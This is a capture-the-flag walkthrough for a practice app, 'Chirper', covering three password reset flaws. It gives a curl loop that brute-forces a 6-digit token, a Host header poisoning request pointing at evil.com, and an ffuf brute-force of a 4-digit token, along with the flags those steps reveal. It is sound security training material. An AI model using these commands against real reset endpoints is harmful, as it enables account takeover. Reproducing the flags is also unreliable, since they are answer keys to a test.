Learn Hacking by Actually Hacking

Difficulty

Intermediate

Vuln class

Password Reset Vulnerabilities

Steps

// Objective

Exploit three password reset weaknesses: token enumeration (Flag 1), host header poisoning (Flag 2), and predictable token brute-force (Flag 3).

// Tools required

BrowserBurp Suiteffufcurl

// Step-by-step walkthrough

Token enumeration (Flag 1)

Request a reset for admin@chirper.com. Chirper issues a 6-digit numeric token with a small range. Enumerate it using a loop that posts each candidate and greps for success.

Command / Input

for i in $(seq 100000 999999); do r=$(curl -s -X POST http://TARGET/reset/verify \ -d "token=$i&email=admin@chirper.com") if echo "$r" | grep -q "success"; then echo "TOKEN: $i"; break; fi done

Output

TOKEN: 123456 {"message":"success","flag":"HackrGG{ch1rp3r_r3s3t_t0k3n_3num}"}

⚑ The grep -q checks for "success" in each response — stops when the correct token is found.

Host header poisoning (Flag 2)

Request a fresh reset for admin. Intercept in Burp and change the Host header to evil.com. The server builds the reset link using the Host header — a debug endpoint reveals the generated token.

Command / Input

POST /forgot Host: evil.com {"email":"admin@chirper.com"}

Output

{"message":"Reset link sent","debug_token":"abc123xyz","flag":"HackrGG{p4ssw0rd_r3s3t_h0st_h34d3r_p01s0n}"}

⚑ In production the token goes to the poisoned domain. Here the debug mode reveals it directly.

Short token brute-force (Flag 3)

Request one more reset. The token is a 4-digit number — brute-force all 10,000 values with ffuf.

Command / Input

ffuf -u http://TARGET/reset?token=FUZZ -w <(seq -w 0 9999) -mc 200

Output

{"flag":"HackrGG{p4ssw0rd_r3s3t_pr3d1ct4bl3_t0k3n}"}

⚑ Tokens must be cryptographically random (32+ hex chars), single-use, and expiring.

// Flag

Flag value

HackrGG{ch1rp3r_r3s3t_t0k3n_3num}

Three flags via three different reset vulnerabilities in the same application.

Chirper — Password Reset